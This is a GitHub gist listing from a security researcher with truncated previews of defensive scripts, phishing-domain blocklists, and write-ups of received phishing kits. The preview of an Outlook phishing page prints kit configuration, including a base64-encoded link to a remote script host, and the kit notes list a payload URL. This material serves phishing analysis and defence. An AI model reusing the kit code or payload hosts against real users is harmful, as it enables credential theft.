Skip to content

Instantly share code, notes, and snippets.

View miglen's full-sized avatar
👨‍💻

Miglen Evlogiev miglen

👨‍💻
View GitHub Profile
@miglen
miglen / collector.sh
Created October 6, 2024 07:52
Phishing feeds collector
#!/bin/bash
folder_prefix="./feeds/" # $(date +%Y/%m/%d)
mkdir -p ${folder_prefix}
rm -f ${folder_prefix}/*.txt
curl -L -s https://phishing.army/download/phishing_army_blocklist_extended.txt -o ${folder_prefix}/phishing_army_domains.txt
curl -L -s https://hole.cert.pl/domains/domains.csv | cut -f 2 > ${folder_prefix}/cert_pl_domains.txt
curl -L -s https://urlabuse.com/public/data/phishing_url.txt -o ${folder_prefix}/urlabuse_urls.txt
curl -L -s https://threatview.io/Downloads/DOMAIN-High-Confidence-Feed.txt -o ${folder_prefix}/threatview_domains.txt
@miglen
miglen / function.sh
Created July 10, 2024 20:57
Clone or mirror website as static with wget
scrapy () {
get \
--mirror \
--no-clobber \
--page-requisites \
--adjust-extension \
--convert-links \
--restrict-file-names=windows \
--domains=$1 \
--no-parent \
@miglen
miglen / phishing.html
Created November 23, 2022 15:30
Outlook phishing portal attempt via html (educational only, I have received this via email)
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<script>
let EMAIL_ADDRESS = "user@company.com"; // Change this to the email address
let BASED64_ENCODED_EMAIL = ""; // If you wish to encode the email address, enter the based64 encoded email and leave the email address blank otherwise, leave this field blank
let SCRIPT_LINK_URL = window.atob("aHR0cHM6Ly9tZWdhdGVycmEuaHUvc2NyaXB0LnBocA"); //Enter the script link here
@miglen
miglen / README.md
Created July 14, 2022 06:07
moj1 phishing kit

This is the contents from a phishing attemt I had recieved recently.

Workflow

  1. Recieve an attachment.html usually from a free email service.
  2. The email contains html file with encoded JS that would call http://angelotti.it/cms/moj1.js
  3. Once you open the html file an outlook login portal will be visualized to authenticate.

IoCs:

@miglen
miglen / Facebook Messenger Phishing Campaign via zu7.eu .md
Last active May 31, 2022 17:02
Facebook Messenger Phishing Campaign via zu7.eu

Today I had recieved an interesting phishing message via Messenger from a frend, who's also a tech guy so it was suprirpising that he got compromised.

The initial message said:

Is it you in this video? 😱
https://zu7.eu/L3VAD6EzsR

The url loaded from any browser, orther than mobile will redirect to twitch.tv otherwise it would display the following html:

@miglen
miglen / xss.py
Created February 25, 2022 09:53
Simple automated XSS check with selenium
import requests
import time
import urllib.parse
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.common.exceptions import NoAlertPresentException
url = "https://xss-game.appspot.com/level1/frame"
response = requests.get(url)
soup = BeautifulSoup(response.text)
@miglen
miglen / Esox-Lucius_PiHoleblocklists.txt
Created September 30, 2021 10:13
Esox-Lucius_PiHoleblocklists.txt
This file has been truncated, but you can view the full file.
# Source https://github.com/Esox-Lucius/PiHoleblocklists
0-800-email.com
0-aprcredit-card.website
0-aprcredit-cards.website
0-aprcreditcard.website
0-aprcreditcards.website
0-secure-paypal.com
0.0.0.0 0-0.028.openvpn.cloud.btcchina.com
0.0.0.0 0-100-195.btcc.com
0.0.0.0 0-100-bhd.foxypool.cf
@miglen
miglen / README.md
Created September 1, 2021 13:18
Notes from Vulnerability management in package dependencies @ Softuni - 31.08.2021

Overview

The following page contains my notes and links about the seminar we had @ Softuni on Vulnerability management in package dependencies at 31st of August 2021.

@miglen
miglen / packagejson.py
Created February 10, 2021 11:55
Dirty check for non existing public npm dependencies
#!/bin/env python3
# https://www.bleepingcomputer.com/news/security/researcher-hacks-over-35-tech-firms-in-novel-supply-chain-attack/
# The following script finds all package.json files in the current dir and checks if there are referenced any
# dependencies that no public package is available for, making your application vulnerable to supply-chain attack.
# Simply run ./packagejson.py in your root repository direcotory.
import json
import requests
from pathlib import Path
import urllib.parse